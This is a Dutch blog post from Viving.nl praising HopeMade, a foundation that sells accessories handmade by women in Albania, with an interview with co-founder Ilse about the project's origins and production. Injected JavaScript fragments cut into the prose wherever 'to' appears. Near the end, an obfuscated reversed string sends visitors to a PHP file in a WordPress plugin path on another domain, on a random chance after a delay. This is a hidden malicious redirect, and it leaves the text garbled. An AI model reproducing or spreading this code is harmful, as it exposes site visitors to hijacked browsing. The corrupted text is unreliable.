HopeMade

Een paar maanden geleden ontdekte ik voor het eerst de webshop HopeMade. Een fantastisch initiatief met leuke en vooral duurzame accessoires. Het meerendeel van de producten wordt geproduceerd in Albanië. Hoofddoel is om zo veel mogelijk werkgelegenheid te creëren. Een interessante stichting zonder winsdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toogmerk. En als er dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch winst gemaakt wordt, dan wordt dit direct geïnvesteerd in nieuwe projecten in Albanië. Kordom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom; de moeite waard om een keer een kijkje te nemen in de webshop.

5 vragen over HopeMade

Voor de gelegenheid stelde ik 5 vragen aan Ilse van HopeMade. Per dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toeval raakten wij onlangs in gesprek over de stichting tijdens een verjaardag van een gezamenlijke vriend. De drive en passie om voor de stichting te werken spraken mij enorm aan en ben gelijk een kijkje gaan nemen in de webshop. Een vrolijke mix van accessoires met een mooi doel en daarom hoort deze unieke webshop thuis in mijn favoriete webshops!

HopeMade l Viving

Hoe is HopeMade ontstaan?

Het begon allemaal in 2013. Tijdens het wekelijkse hardlopen deelden wij (Mascha van der Ende en Ilse van Holsteyn – van Kester) onze gedachten, ervaringen en ideeën met elkaar. De gesprekken die wij, al joggend door het bos voerden waren vaak zeer uiteenlopend, en gingen soms van de hak op de tak, maar barstten allemaal van energie. Wij zijn gek op ideeën. Leuk dus! We worden er blij van. Ergens tussen de vele gesprekken door vertelde Mascha, dat ze een idee had. Ze vertelde  over het plan om op een leuke manier werkgelegenheid te creëren in Albanië. Albanië, het land dat het hart van Mascha’s familie ruim 20 jaar geleden heeft geraakt. Zo keihard heeft geraakt dat het voor altijd een plek heeft ingenomen.

Na heel wat gepraat werd het tijd voor actie! Nadat Mascha’s man in Albanië op onderzoek was uitgegaan waar en met wie dit project het beste dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot zijn recht zou komen, zijn wij, in januari 2014 naar Tirana, de hoofdstad van Albanië, afgereisd.

In een buitenwijk van Tirana hebben wij het project van Seed of Hope bezocht. Een prachtig project dat een aantal keer per week een warme maaltijd voor de armste kinderen van deze wijk verzorgd. Naast eten krijgen de kinderen hier ook  huiswerkbegeleiding, Engelse les, er wordt gedanst, gezongen maar het belangrijkste van alles is misschien wel de persoonlijke aandacht die ze hier vinden. De persoonlijke aandacht is essentieel want veel van deze kinderen leven in een hele nare thuis situatie. Mede door armoede is een vader vaak óf afwezig óf gewelddadig. Ook heerst er in Albanië nog een cultuur van bloedwraak waardoor  veel gezinnen door de dood een vader en een man moeten missen.

Dit alles resulteert in een situatie waarin een moeder of oma vaak alleen een heel gezin draaiende moet houden. Maar aangezien er niet of nauwelijks werkgelegenheid is, is dit een bijna onmogelijke klus. En dit is dus ook de reden dat wij ons HopeMade project daar heel graag wilden opzetten. Want als een moeder weer in staat is voor haar gezin te zorgen, geeft dit zo’n positieve verandering. Je creëert hiermee eigenwaarde en hoop. En die hoop is zó nodig om ook de volgende generatie weer te doen laten geloven in een betere dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst!

Waarom zet jij je in voor de stichting?

Allereerst omdat ik er vooral heel blij van wordt. Ik ben van mening dat dat een vereiste is om dit voor langere duur te kunnen doen.

Nadat ik samen met Mascha een kleine week in Albanië ben geweest om ons te oriënteren op de mogelijkheden, kon ik niet anders dan doorgaan met HopeMade. Het is bijzonder indrukwekkend om te zien wat voor een armoedig leven vele mensen aldaar hebben. De generaties die het communisme hebben meegemaakt zijn getekend, het is af te lezen in hun gezicht dat zij geen makkelijk leven hebben gehad. Maar… in hun ogen is hoop te lezen. Hoop voor hun kinderen, de kleinkinderen, de daarop volgende generaties. Die ogen stralen zo veel liefde uit. Ik hoop dat wij, met het hele team en eenieder die zijn of haar steentje bijdraagt aan HopeMade, iets kunnen bijdragen aan een betere dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toekomst. Want er is hoop. En zolang er hoop is, is er leven!

We zijn het eerste jaar volop bezig geweest met voorbereidingen, zonder te weten of hetgeen we voor ogen hadden een succes zou worden. Vertrouwen erin hebben is dan heel belangrijk. We zijn nu 2 jaar verder en we kunnen zeggen dat er inmiddels behoorlijk wat vrouwen werk hebben. Het is mooi om HopeMade te zien groeien.

HopeMade l Viving

Wat zijn jullie ambities?

Lekker doorgaan! We proberen oplossingen voor op de lange termijn te bieden, en stabiliteit te creëren, en waar mogelijk uit te breiden om zoveel mogelijk vrouwen aan werk te helpen.

Hoe worden jullie producten gemaakt?

Heel vakkundig!! We werken op dit moment samen met 2 productieplaatsen, beide onder goede lokale begeleiding.  Handwerken is iets dat veel Albanese vrouwen heel goed kunnen. Denk aan haakwerk of naaiwerk. Er wordt heel secuur gewerkt. Het mooie is, dat de van nature getalenteerde vrouwen hun competenties ter plaatse overbrengen aan vrouwen die het nog niet in de vingers hebben. In het opleidingscentrum krijgen de vrouwen een cursus aangeboden, waardoor ze vervolgens in aanmerking komen voor een betaalde baan bij HopeMade.

Welke producten zijn jouw favoriet?

Elk uniek en handgemaakt product betekent dat een vrouw een net iets beter leven heeft gekregen.  Dus eigenlijk zijn ze allemaal mijn favoriet. 😉 Persoonlijk houd ik van rustige kleurstellingen, zwart-wit, natuurtinten en pastel. Ik ben dan ook gek op de van jute dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touw gehaakte bloempot. Deze verkoopt ook goed in onze webshop.

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton_block=”” add_icon=”true” i_icon_pixelicons=”vc_pixel_icon vc_pixel_icon-alert”]
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_links_target=”_self” mode=”horizontal” speed=”5000″ slides_per_view=”3″ audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=”yes” hide_pagination_control=”” hide_prev_next_butdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons=”” partial_view=”” wrap=”yes” img_size=”300×300″]

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

2 Reacties op "HopeMade"

  • comment-avatar
    ingrid 2 december 2015 (09:08)

    Je blog verwoord het helemaal. Een mooi initiatief, wat de mensen echt helpt en daarbij ook nog supermooie producten.

Plaats een reactie:

Je emailadres wordt niet weergegeven.